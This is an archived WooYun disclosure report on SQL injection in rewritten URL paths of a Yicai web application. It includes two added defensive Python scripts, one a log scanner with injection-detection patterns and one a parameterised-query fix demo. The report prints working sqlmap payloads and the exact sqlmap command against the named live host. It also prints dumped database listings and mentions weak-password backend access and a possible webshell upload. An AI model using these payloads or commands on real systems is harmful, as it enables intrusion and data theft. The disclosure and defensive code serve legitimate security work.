
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0160689

Title: Bundle of pseudo-static (URL-rewrite) SQL injection flaws on a 第一财经 (Yicai) site (a weak admin password gives backend access, and the backend has pseudo-static injection as well)

Vendor: 第一财经 (Yicai)

Author: 路人甲

Submitted: 2015-12-14 12:10

Fixed: 2016-01-25 18:01

Published: 2016-01-25 18:01

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-12-14: Details sent to the vendor; awaiting vendor handling
2015-12-14: Vendor confirmed; details visible to the vendor only
2015-12-24: Details disclosed to core white hats and relevant domain experts
2016-01-03: Details disclosed to regular white hats
2016-01-13: Details disclosed to intern white hats
2016-01-25: Details disclosed to the public

Brief description:

Multiple pseudo-static (URL-rewritten) SQL injection points, a weak backend password, and further pseudo-static injection inside the backend.

Detailed description:

Injection point one:
http://lcbt.yicai.com/yicai/index.php/Home/Index/news/classify/6/pid/130/id/140/p/3.html
The values following classify, pid and id in the rewritten path are injectable.
When sqlmap asks which injection point to use, pick #3*; the later --users, --dbs and similar steps only extract correctly through that one.

[screenshot 1.jpg]

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #2*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6/pid/130) AND 3988=3988 AND (1779=1779/id/140/p/3.html

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6/pid/130) AND (SELECT 4288 FROM(SELECT COUNT(*),CONCAT(0x7173726771,(SELECT (CASE WHEN (4288=4288) THEN 1 ELSE 0 END)),0x7169796971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3580=3580/id/140/p/3.html

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6/pid/130); SELECT SLEEP(5)-- /id/140/p/3.html

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6/pid/130) AND SLEEP(5) AND (4785=4785/id/140/p/3.html

Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6) AND 9793=9793 AND (5327=5327/pid/130/id/140/p/3.html

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6) AND (SELECT 9240 FROM(SELECT COUNT(*),CONCAT(0x7173726771,(SELECT (CASE WHEN (9240=9240) THEN 1 ELSE 0 END)),0x7169796971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (9231=9231/pid/130/id/140/p/3.html

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6); SELECT SLEEP(5)-- /pid/130/id/140/p/3.html

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6) AND SLEEP(5) AND (7731=7731/pid/130/id/140/p/3.html

Place: URI
Parameter: #3*
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6/pid/130/id/140) AND (SELECT 6249 FROM(SELECT COUNT(*),CONCAT(0x7173726771,(SELECT (CASE WHEN (6249=6249) THEN 1 ELSE 0 END)),0x7169796971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3326=3326/p/3.html

    Type: UNION query
    Title: MySQL UNION query (87) - 1 column
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6/pid/130/id/-2848) UNION ALL SELECT CONCAT(0x7173726771,0x584b4552797377436b77,0x7169796971)#/p/3.html

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6/pid/130/id/140); SELECT SLEEP(5)-- /p/3.html

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6/pid/130/id/140) AND SLEEP(5) AND (9960=9960/p/3.html
---
there were multiple injection points, please select the one to use for following injections:
[0] place: URI, parameter: #2*, type: Unescaped numeric (default)
[1] place: URI, parameter: #3*, type: Unescaped numeric
[2] place: URI, parameter: #1*, type: Unescaped numeric
[q] Quit
> 1
[10:17:07] [INFO] testing MySQL
[10:17:07] [INFO] confirming MySQL
[10:17:07] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: MySQL >= 5.0.0
[10:17:07] [INFO] fetching current user
[10:17:07] [WARNING] reflective value(s) found and filtering out
current user: 'hzcg@%'
[10:17:07] [INFO] fetching current database
current database: 'hzcg'
[10:17:08] [INFO] testing if current user is DBA
[10:17:08] [INFO] fetching current user
[10:17:08] [INFO] heuristics detected web page charset 'utf-8'
[10:17:08] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
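The sqlmap output above shows the payload shapes that reached the server (boolean tautologies such as AND 3988=3988, SLEEP(5), stacked ; SELECT, UNION ALL SELECT, subselects on INFORMATION_SCHEMA), all carried inside path segments that the application treats as numeric ids. The script below is an added example, not part of the report and not the site's or sqlmap's code: it parses ThinkPHP-style path-info URLs out of web-server access log lines, flags any numeric route parameter (classify, pid, id, p) whose value is not a plain integer, and tags the payload family. The log lines are constructed for the example, and the route layout (index.php/Module/Controller/action/key/value...) is assumed from the URLs in the report.

```python
import re
from urllib.parse import unquote

# Path segments the site's routes treat as numeric identifiers
# (classify, pid, id, p are the keys that appear in the report's URLs).
NUMERIC_PATH_KEYS = {"classify", "pid", "id", "p"}

# Payload families seen in the sqlmap output above.
PAYLOAD_PATTERNS = [
    ("boolean-tautology", re.compile(r"\bAND\s+\(?\d+=\d+", re.I)),
    ("time-based", re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I)),
    ("stacked-query", re.compile(r";\s*SELECT\b", re.I)),
    ("union-select", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("information-schema", re.compile(r"\bINFORMATION_SCHEMA\b", re.I)),
]

# Request line of a Common Log Format entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def pathinfo_params(path):
    """Split a path-info URL (/index.php/Module/Controller/action/k1/v1/k2/v2.html)
    into its key/value pairs, the way the framework routes them (assumed layout)."""
    path = path.split("?", 1)[0]
    if path.endswith(".html"):
        path = path[:-5]
    parts = [p for p in path.split("/") if p]
    try:
        start = parts.index("index.php") + 4   # skip index.php/Module/Controller/action
    except ValueError:
        return {}
    rest = parts[start:]
    return {rest[i]: rest[i + 1] for i in range(0, len(rest) - 1, 2)}


def classify_request(path):
    """Return (key, reason) findings for one request path; [] means nothing suspicious."""
    findings = []
    for key, value in pathinfo_params(unquote(path)).items():
        if key in NUMERIC_PATH_KEYS and not re.fullmatch(r"-?\d+", value):
            findings.append((key, "non-numeric value in numeric path segment"))
        for name, pat in PAYLOAD_PATTERNS:
            if pat.search(value):
                findings.append((key, name))
    return findings


def scan_access_log(lines):
    """Return (line_no, path, findings) for each log line that carries an injection shape."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        findings = classify_request(m.group("path"))
        if findings:
            hits.append((n, m.group("path"), findings))
    return hits


# Constructed sample log lines (not from the report). The injected values mirror
# the sqlmap payload shapes above, URL-encoded as a web server would log them.
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Dec/2015:10:17:07 +0800] "GET /yicai/index.php/Home/Index/news/classify/6/pid/130/id/140/p/3.html HTTP/1.1" 200 5120',
    '203.0.113.5 - - [14/Dec/2015:10:17:07 +0800] "GET /yicai/index.php/Home/Index/news/classify/6/pid/130)%20AND%203988=3988%20AND%20(1779=1779/id/140/p/3.html HTTP/1.1" 200 5120',
    '203.0.113.5 - - [14/Dec/2015:10:17:07 +0800] "GET /yicai/index.php/Home/Index/news/classify/6/pid/130);%20SELECT%20SLEEP(5)--%20/id/140/p/3.html HTTP/1.1" 200 5120',
    '203.0.113.5 - - [14/Dec/2015:10:17:08 +0800] "GET /yicai/index.php/Home/Index/news/classify/6/pid/130/id/-2848)%20UNION%20ALL%20SELECT%20CONCAT(0x71,0x58,0x71)%23/p/3.html HTTP/1.1" 200 5120',
    '203.0.113.5 - - [14/Dec/2015:10:17:09 +0800] "GET /yicai/index.php/Home/index/about/pid/135.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, path, findings in scan_access_log(SAMPLE_LOG):
        print(n, path, findings)
```

The structural check (a numeric route key whose value is not an integer) fires on every payload regardless of family, so the signature list is only there to label the technique for the analyst; a WAF-evaded variant that the regexes miss is still caught by the first rule.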


For the following steps sqlmap needs --no-cast or --hex; in the final dump test --no-cast turned out to work best.
sqlmap.py -u "http://lcbt.yicai.com/yicai/index.php/Home/Index/news/classify/6*/pid/130*/id/140*/p/3*.html" --threads 10 --dbms "MySQL" --users --dbs --no-cast

[screenshot 2.jpg]


database management system users [1]:
[*] 'hzcg'@'%'
available databases [2]:
[*] hzcg
[*] information_schema
Database: hzcg
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| x2_questions          | 864     |
| x2_quest2knows        | 759     |
| yicai_file            | 155     |
| yicai_news            | 120     |
| bbs                   | 95      |
| feedback              | 83      |
| x2_examsession        | 54      |
| x2_examhistory        | 50      |
| userinfo              | 44      |
| x2_knows              | 39      |
| x2_questype           | 35      |
| x2_questionrows       | 34      |
| xj_posts              | 29      |
| annotator             | 26      |
| works                 | 24      |
| x2_openbasics         | 18      |
| x2_sections           | 17      |
| x2_exams              | 16      |
| yicai_channel         | 16      |
| x2_user               | 12      |
| xj_fy_sx              | 12      |
| xj_leibie             | 12      |
| x2_coupon             | 10      |
| x2_block              | 8       |
| x2_module             | 7       |
| x2_module_fields      | 7       |
| x2_app                | 6       |
| x2_basic              | 6       |
| x2_session            | 6       |
| yicai_article_article | 6       |
| yicai_article_news    | 6       |
| x2_subject            | 5       |
| xj_kj                 | 5       |
| x2_favor              | 4       |
| x2_special            | 4       |
| yicai_news_classify   | 4       |
| x2_user_group         | 3       |
| x2_gbook              | 2       |
| x2_specialsort        | 2       |
| yicai_member          | 2       |
| yicai_model           | 2       |
| yicai_ucenter_member  | 2       |
| x2_area               | 1       |
| x2_product            | 1       |
| x2_seminar            | 1       |
| yicai_kj              | 1       |
+-----------------------+---------+


[screenshots 3.jpg, 4.jpg, 5.jpg, 6.jpg]


Injection point two:
http://lcbt.yicai.com/yicai/index.php/Home/index/about/pid/135.html
Again the value after pid in the rewritten path is injectable, but not every pid parameter is; this one, for example, is not:
http://lcbt.yicai.com/yicai/index.php/Home/index/index1/pid/128*.html

[screenshot 7.jpg]


Injection point three:
http://lcbt.yicai.com/yicai/index.php/Home/Index/lcbt/pid/129/id/138.html
The values after pid and id in the rewritten path are injectable.

[screenshot 8.jpg]


A weak administrator password gets you into the backend; you can guess which weak password.

[screenshots 9.jpg, 10.jpg, 11.jpg]


As for obtaining a webshell, I did not test it: the backend lets you add a news item and upload an image with it, so I won't go as far as bypassing the upload to place a webshell.
Injection point four:
The backend also has several pseudo-static injection points. To avoid corrupting data I did not test them; check them yourselves.

[screenshots 12.jpg, 13.jpg, 14.jpg]

Proof of vulnerability:

As above.

Fix:

Filter the input.
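The report's fix is the single word "filter". As an added illustration (not the author's or the site's code; the site runs PHP, and Python stands in here for the framework's controller), the script below puts the defect beside the fix: a path-info route parser, a lookup that splices the route values straight into the SQL text as the report describes (reproducing the boolean-blind oracle from the sqlmap output, where a 1=1 and a 1=2 variant return different results), and a hardened lookup that whitelists the route keys, accepts only plain integers, and binds them as query parameters so the SQL text never contains user input. The news table, its columns and the query shape are assumptions constructed for the example.

```python
import re
import sqlite3

# Route parameters the news action accepts, each required to be an integer.
# Assumption (not from the report): mirrors /news/classify/6/pid/130/id/140/p/3.html.
ALLOWED_INT_PARAMS = ("classify", "pid", "id", "p")


def pathinfo_params(path):
    """Split the path after index.php/Module/Controller/action into key/value pairs (assumed layout)."""
    if path.endswith(".html"):
        path = path[:-5]
    parts = [p for p in path.split("/") if p]
    start = parts.index("index.php") + 4
    rest = parts[start:]
    return {rest[i]: rest[i + 1] for i in range(0, len(rest) - 1, 2)}


def validated_ints(params):
    """Whitelist the keys and require each value to be a plain, bounded integer; reject otherwise."""
    clean = {}
    for key in ALLOWED_INT_PARAMS:
        raw = params.get(key)
        if raw is None or not re.fullmatch(r"\d{1,9}", raw):
            raise ValueError(f"bad or missing route parameter {key!r}: {raw!r}")
        clean[key] = int(raw)
    return clean


def setup_db():
    """Constructed in-memory table standing in for the site's news table (schema is an assumption)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER, classify INTEGER, pid INTEGER, title TEXT)")
    con.executemany("INSERT INTO news VALUES (?, ?, ?, ?)", [
        (140, 6, 130, "public article"),
        (141, 6, 130, "another public article"),
        (900, 9, 999, "unrelated record"),
    ])
    return con


def vulnerable_lookup(con, params):
    """The pattern the report describes: raw route values dropped into the SQL text.
    The parenthesised WHERE clause is an assumption that explains the ')' in the payloads."""
    sql = ("SELECT title FROM news WHERE (classify = %s AND pid = %s AND id = %s)"
           % (params["classify"], params["pid"], params["id"]))
    return [r[0] for r in con.execute(sql)]


def hardened_lookup(con, params):
    """Validated integers bound as parameters; rejects anything that is not a plain id."""
    p = validated_ints(params)
    sql = "SELECT title FROM news WHERE (classify = ? AND pid = ? AND id = ?)"
    return [r[0] for r in con.execute(sql, (p["classify"], p["pid"], p["id"]))]


if __name__ == "__main__":
    con = setup_db()
    normal = pathinfo_params("/yicai/index.php/Home/Index/news/classify/6/pid/130/id/140/p/3.html")
    print("hardened, normal request:", hardened_lookup(con, normal))
    # The boolean-blind oracle: the vulnerable form answers differently to 1=1 and 1=2,
    # while the hardened form refuses both because the id segment is not an integer.
    for probe in ("140) AND (1=1", "140) AND (1=2"):
        tampered = dict(normal, id=probe)
        print("vulnerable:", repr(probe), vulnerable_lookup(con, tampered))
        try:
            hardened_lookup(con, tampered)
        except ValueError as exc:
            print("hardened rejected:", exc)
```

Casting to int is the minimal version of this fix and would already close the injection; binding parameters as well keeps the query safe if a later change admits a string-valued route parameter, and the whitelist means an unexpected key such as a second "pid" cannot reach the query at all.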

Copyright notice: when reproducing, credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Low

Rank: 5

Confirmed: 2015-12-14 12:53

Vendor reply:

Information received; thank you very much for your work.

Latest status:

None yet